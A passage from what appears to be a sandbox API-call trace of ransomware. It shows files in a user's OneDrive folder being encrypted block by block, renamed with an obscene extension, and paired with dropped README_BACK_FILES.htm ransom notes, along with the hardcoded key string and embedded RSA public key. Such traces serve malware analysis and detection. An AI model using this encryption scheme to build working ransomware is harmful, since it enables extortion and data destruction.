lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.477] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.477] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.477] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.477] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.478] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.478] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.478] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.478] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.478] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.478] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.478] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.478] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.478] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.478] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.478] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.478] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x150, lpOverlapped=0x0) returned 1 [0273.478] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x150, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x160) returned 1 [0273.478] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x160, lpOverlapped=0x0) returned 1 [0273.478] CloseHandle (hObject=0x5d48) returned 1 [0273.478] CloseHandle (hObject=0x5d4c) returned 1 [0273.479] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bs-latn-ba\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bs-latn-ba\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0273.485] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0273.485] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bs-latn-ba\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0273.488] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bs-latn-ba\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bs-latn-ba\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0273.490] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0273.490] CryptDestroyKey (hKey=0x2faa48) returned 1 [0273.490] CryptReleaseContext (hProv=0x2f295b8, dwFlags=0x0) returned 1 [0273.490] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0273.490] FindClose (in: hFindFile=0x2fa748 | out: hFindFile=0x2fa748) returned 1 [0273.490] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bs-latn-ba\\readme_back_files.htm")) returned 0xffffffff [0273.490] AreFileApisANSI () returned 1 [0273.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0273.490] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bs-latn-ba\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0273.491] GetFileType (hFile=0x5d3c) returned 0x1 [0273.492] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0273.496] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0273.496] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0273.497] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.497] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.497] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0273.497] GetLastError () returned 0x0 [0273.497] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca\\filesync.localizedresources.dll.mui")) returned 0x20 [0273.498] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0273.498] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0273.499] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ca\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0273.500] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ca\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0273.501] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f28c28) returned 1 [0273.503] CryptCreateHash (in: hProv=0x2f28c28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0273.503] lstrlenA (lpString="VjnQjmgTDrnneBnnDhUveiykzMlQm") returned 29 [0273.503] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0273.504] CryptDeriveKey (in: hProv=0x2f28c28, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fae08) returned 1 [0273.504] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0273.504] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0273.504] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f297d8) returned 1 [0273.504] CryptImportPublicKeyInfo (in: hCryptProv=0x2f297d8, dwCertEncodingType=0x1, pInfo=0x2f344b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f344e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f344e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2faf88) returned 1 [0273.504] CryptEncrypt (in: hKey=0x2faf88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0273.504] CryptEncrypt (in: hKey=0x2faf88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f28e48*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f28e48*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0273.505] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f28e48*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f28e48*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0273.506] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.520] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.520] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.522] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.523] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.523] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.523] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.523] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.523] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.524] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.524] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.524] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.524] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.524] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.524] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.524] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.524] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.524] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.524] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.524] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.524] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.525] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.525] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.525] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.525] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.525] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.525] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.525] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.525] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.525] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.525] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.525] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.525] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.526] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.526] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.526] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.526] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.526] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.526] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.526] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.526] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.526] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.526] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.526] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.526] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.526] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.527] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.527] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, 